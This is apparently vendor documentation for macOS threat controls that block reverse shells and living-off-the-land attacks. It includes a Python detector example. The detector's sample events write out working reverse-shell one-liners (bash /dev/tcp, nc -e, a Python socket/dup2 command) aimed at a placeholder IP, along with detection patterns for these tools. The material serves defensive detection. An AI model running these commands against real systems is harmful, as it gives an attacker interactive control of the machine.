The content in this section applies to the legacy threat prevention strategy in macOS Security. The legacy strategy will be deprecated in a future version of macOS Security. For information and instructions on configuring threat prevention strategies, see Threat Prevention (Beta).
Advanced threat controls intervene when unsafe or malicious activity considered high-risk by Jamf Threat Labs is detected. Detected activity is blocked and reported to administrators for further investigation.
This reduces the system's attack surface and increases protection against fileless malware and attackers employing the living-off-the-land (LotL) technique.
Available controls are derived from real-world attacks and observed threat actor behaviors, as well as behaviors known to weaken system security. Advanced threat controls target and block reverse shells.
- Living off the Land (LotL): Living-off-the-land attacks involve threat actors using legitimate software and tools already present on the system to carry out their attack. Instead of introducing custom malware, attackers exploit administrative tools, scripts, or system utilities built into the platform (shells, interpreters, networking utilities) to achieve their objectives while blending in with normal activity, which makes signature-based detection of dropped files ineffective.
- Reverse Shell: A reverse shell is a common technique attackers use to command and control a compromised system. The compromised host opens an outbound connection back to the attacker's machine and attaches a shell to that connection, so the attacker gains interactive control of the machine, typically to perform reconnaissance, execute further attack stages, or exfiltrate data. Because the connection is outbound, it often passes rules that only restrict inbound traffic.
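To make the two definitions concrete, the following is an added example (not Jamf Protect's detection logic, and not code from the original page) of how a detector can recognize living-off-the-land reverse shells from process events. It combines two signals: command-line patterns for well-known one-liners built from built-in tools (bash with `/dev/tcp`, netcat with `-e`, a Python socket plus `dup2`), and the structural signature shared by every reverse shell, a shell process whose standard file descriptors are bound to a socket rather than a terminal. The event format, the `ProcEvent` class, the descriptor kinds, and the sample events (using the 192.0.2.0/24 documentation range) are all constructed for this example; a real implementation would source them from the endpoint security framework or an `lsof`-style fd listing.

```python
"""Hypothetical living-off-the-land reverse-shell detector (constructed example).

Input: process-exec events carrying the executable name, the command line and
a map of standard file descriptors to their kind ("tty", "file", "pipe",
"socket"). Output: the list of indicators that fired for each event.
"""
import re
from dataclasses import dataclass, field

# Shells whose stdio we expect on a terminal, pipe or file, never on a socket.
SHELLS = {"sh", "bash", "zsh", "dash"}

# Command-line heuristics for common one-liners that reuse built-in tools.
CMDLINE_PATTERNS = {
    # bash's /dev/tcp and /dev/udp pseudo-devices: /dev/tcp/<host>/<port>
    "bash_dev_tcp": re.compile(r"/dev/(tcp|udp)/\S+/\d+"),
    # netcat handing a program (usually a shell) to the remote peer
    "nc_exec": re.compile(r"\b(nc|ncat|netcat)\b.*\s-(e|c)\s"),
    # python: open a socket, then dup2 it over the standard descriptors
    "python_dup2": re.compile(r"socket\.socket\(.*dup2\("),
}


@dataclass
class ProcEvent:
    pid: int
    exe: str                       # basename of the executable
    cmdline: str
    fds: dict = field(default_factory=dict)  # fd number -> descriptor kind


def cmdline_indicators(ev: ProcEvent) -> list:
    """Names of command-line patterns that match this event, sorted."""
    return sorted(name for name, pat in CMDLINE_PATTERNS.items()
                  if pat.search(ev.cmdline))


def stdio_on_socket(ev: ProcEvent) -> bool:
    """True when a shell has stdin, stdout or stderr backed by a socket.

    This catches reverse shells regardless of which tool set them up, because
    the end state is always a shell talking to a network socket.
    """
    return ev.exe in SHELLS and any(ev.fds.get(fd) == "socket" for fd in (0, 1, 2))


def classify(ev: ProcEvent) -> list:
    """All indicators for one event; an empty list means nothing suspicious."""
    reasons = cmdline_indicators(ev)
    if stdio_on_socket(ev):
        reasons.append("shell_stdio_socket")
    return reasons


def flag_events(events) -> dict:
    """Map pid -> indicators for every event that triggered at least one."""
    return {ev.pid: classify(ev) for ev in events if classify(ev)}


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # The parent shell that launches `bash -i >& /dev/tcp/192.0.2.10/4444 0>&1`:
    # the pseudo-device path is visible only in this command line.
    ProcEvent(106, "sh", 'sh -c "bash -i >& /dev/tcp/192.0.2.10/4444 0>&1"',
              {0: "tty", 1: "tty", 2: "tty"}),
    # The child bash: redirections were consumed by the parent, so its command
    # line is just "bash -i" and only the fd table reveals the socket.
    ProcEvent(101, "bash", "bash -i", {0: "socket", 1: "socket", 2: "socket"}),
    # netcat with -e handing /bin/sh to the remote side.
    ProcEvent(102, "nc", "nc -e /bin/sh 192.0.2.10 4444",
              {0: "tty", 1: "tty", 2: "tty"}),
    # python one-liner: connect, then dup2 the socket over stdin.
    ProcEvent(103, "python3",
              "python3 -c \"import socket,os;s=socket.socket();"
              "s.connect(('192.0.2.10',4444));os.dup2(s.fileno(),0)\"",
              {0: "socket", 1: "tty", 2: "tty"}),
    # Benign: a shell running curl with stdio on a terminal.
    ProcEvent(104, "bash", 'bash -c "curl -s https://example.invalid/health"',
              {0: "tty", 1: "tty", 2: "tty"}),
    # Benign: a daemon legitimately handed a listening socket on stdin
    # (launchd-style); it is not a shell, so the fd rule does not apply.
    ProcEvent(105, "httpd", "httpd -f", {0: "socket", 1: "file", 2: "file"}),
]

if __name__ == "__main__":
    for pid, reasons in flag_events(SAMPLE_EVENTS).items():
        print(pid, reasons)
```

Note the pair of events 106 and 101: the command-line rule fires on the parent and the fd rule on the child, which is why a control that only inspects command lines is easy to evade (an attacker can stage the redirection through an extra process or an obfuscated script) while the socket-backed stdio check survives such variations. A production rule set would also need an allowlist for legitimate socket-activated services and for remote-management agents that intentionally bridge a shell to a network connection.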
Advanced threat controls are disabled by default. To enable this feature, create or edit a Jamf Protect plan and set the advanced threat controls setting to Block and report or Report only. Report only records detections without intervening, which lets you confirm that the control does not fire on legitimate tooling in your environment before switching the plan to Block and report.